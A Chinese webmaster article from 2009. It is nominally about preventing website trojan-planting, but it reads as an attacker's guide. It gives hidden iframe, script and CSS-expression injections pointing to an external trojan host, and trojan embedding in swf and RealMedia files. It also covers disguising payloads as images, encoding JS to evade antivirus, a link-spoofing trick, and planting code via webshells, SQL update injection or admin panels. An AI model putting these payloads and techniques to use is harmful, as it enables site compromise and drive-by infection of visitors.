当前位置: 首页 > 图文教程 > 网站运营 > 建站经验 > 杜绝挂马 就要了解挂马者的常用方法技巧

建站经验
11个PR7以上的国内网址导航站
国内现状 目前没几个博客能赚钱
网站推广最重要的2点 细节和坚持
给想通过博客赚钱的站长朋友的一些建议
网络推广经验 前期准备和发帖原则
盈利模式 细分市场是站长梦开始的地方
把握博客更新时间
总结网站推广中需要避免的12种推广方式
淘宝网店推广重点 抓住潜在的购买客户
建站杂谈 2010年web领域的预测
给用户一个无法拒绝的回访理由
建站案例 地方门户网站运营的心酸事
制作英文网站的基本流程
网站备案 图文教程
独立域名的英文博客从WordPress切换到Blogger的步骤
大胆尝试电子商务 改变传统盈利思路
404页面设计全攻略
以收购网站为名的商业间谍不可不防
运营企业网站来实现营销目标的经验
淘宝的站内搜索能改变搜索格局?

建站经验 中的 杜绝挂马 就要了解挂马者的常用方法技巧


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-17   浏览: 43 ::
收藏到网摘: n/a

1、挂马的N种方法

(1) HTML挂马法。

常规的HTML挂马方法一般是在网页中插入一条iframe语句,像<iframe src=http://www.zw361.com/horse.html width=0 height=0></iframe>。查看站点是否被挂,一般是查找一下关键词iframe。

(2) 再隐藏一点的就是js挂马了。

像再原来的网页中写入<script str=http://www.zw361.com/horse.js></script> ,horse里的js写法一般为 document.write(’http:\/\/www.zw361.com\/horse.html’>;,或者专业一点的写法是 top.document.body.innerHTML = top.document.body.innerHTML + ‘\r\n<inframe src=http://www.zw361.com/horse.htm/”></iframe>’’;。不过第2种写法要注意:是原来的网页种要有body标签。

3) 在 css中挂马。

这个方法就是在css中写入

body {
hytop:expression(top.document.body.innerHTML = top.document.body.innerHTML + ‘\r\n<iframe src=http://www.xxx.com/horse.html/”></iframe>’);
}

然后在主页中调用这个CSS,代码类似http://www.zw361.net/css.css” rel=”stylesheet” type=”text/css”>这样的。在csdn 中对expression的解释是:IE5及其以后版本支持在CSS中使用expression,用来吧CSS属性和javascript表达式关联起来,这里的CSS属性可以是元素固有的属性,也可以是自定义属性。也就是说CSS属性后面可以是一段Javasccript表达式,CSS属性的值等于 javascript表达式计算的结果。在表达式中可以是直接一用元素自身的属性和方法,也可以使用其它浏览器对象。这个表达式就好像是在这个元素的一个成员函数中一样。整个解释关键点是expression可以在css中引入js语句,所以我们可用于挂马。不过写的语句值可以远程调用,本地不可以。

(4) 在swf中挂马

网上有一些swf挂马的工具,可以用工具替换原来网页中的swf或单独把swf发给对方,一可以单独作一个可显示swf页的网页。在网页中插入swf的语法一般格式为:

<OBJECT classid=clsid:D27CDB6E-AE6D-11cf-96B8-444553540000 codebase=http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5.0.0.0 WIDTH=760 NAME=quality VALUE=high> <EMBED src=http://www.7747.net/xxx.swf” quality=high pluginspage=http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash type=application/x-shockwave-flash width=760 height=60></EMBED></OBJECT>

(5) 在影音文件中挂马。

所需工具是RealMedia Editor,打开工具后,然后依次选择“文件”-“打开Real媒体文件”,然后选择需要编辑的视频文件,其格式必须是RealOne公司的以RM或 RMVB为扩展名的文件。接着,新建一个文本,在里面输入u 00:00:10:0 00:00:30.0&&_rpexternal& http://www.zw361.com/horse.htm (00:00:10.0就是发生第一事件的时间,这里是让计算机弹出网页;00:00:30.0同样,这是第二次发生的时间,在0时0分第30秒0微妙时弹出窗口;而后面的URL地址就是连接指定的木马地址。)

输入完毕后并保存,然后依次选择“工具”-“合并事件”,导入刚才的文本。当合并完成后,依次选择“文本”-“Real文件另存为”,保存好即可。

最后把生成的视频文件发布网上,当对方观看同时就会连接到你指定的木马地址

2、挂马的技巧

挂马首先要求的是隐蔽性,这样挂的时间才能长。像在SWF、JS、RM中挂马就是比较隐蔽了,但是还可再用到些技巧。

(1)远程任意后缀执行HTML

可以把horse.html改成horse.jpg之类的后缀,然后语句写成<iframesrc=/uploadfile/200902/20090220105353594.jpg width=0 height=0></iframe>。js也可以,语句为<script src=/uploadfile/200902/20090220105353594.jpg></script>,甚至js的不要后缀名都可以。

2)JS的加密

为了保护网页木马的代码,可以把JS内容加密,还能躲开杀软的作用。如果使用ENCODE加密方式,加密后的JS调用语句就用<scriptlanguage=”jscript”.encode”src=http://www.zw361.com/horse.txt& gt;</script>。除此方法外,还有其它更多的方法!

(3)URL的变形

URL的变形方法也有很多,例如将url的16进制转换为encod编码等。如果是涉及到URL欺骗的方法就更多了,不过多数的URL欺骗,像利用@的技巧,IE都已经打补丁了。但现在有个漏洞仍然有效,代码如下:

<a id=”CZY” href=http://www.zw361.com”></a>
<div>
<a href=http://www.google.cn” target=”_blank”>
<table>
<caption>
<a href=http://www.google.cn” target=”_blank”>
<label for=”CZY”>
<u style=”cursor: pointer: color: blue”>
Google</u>
</label></a></caption></table></a></div>

保存该代码为网页后,鼠标移动到Google这个链接上时,IE状态栏显示的http://www.google.cn,但点击链接后却打开http://www.zw361.cn网站。如果你的网马可以用IP地址访问到的话,IP地址也可以进行转换的。像127.0.0.1这样的IP还可以变为 2130706433、0×7f.0×00.0×00.0×01、0177.0000.0000.0001等等,这只不过是8进制、10进制、16进制、的转换而已。

3、如何才能挂到马

拿到了webshell的话,挂马自然是很简单了。但是拿不到的情况下,如果注入点有update权限,我们可以仔细查找首页中的某条新闻的调用链接,然后update数据库达到我们的目的。如果可进入后台,我没就可以在一些发公告的地方写入自己的木马代码(不过千万别打乱前台html源文件里的代码逻辑)。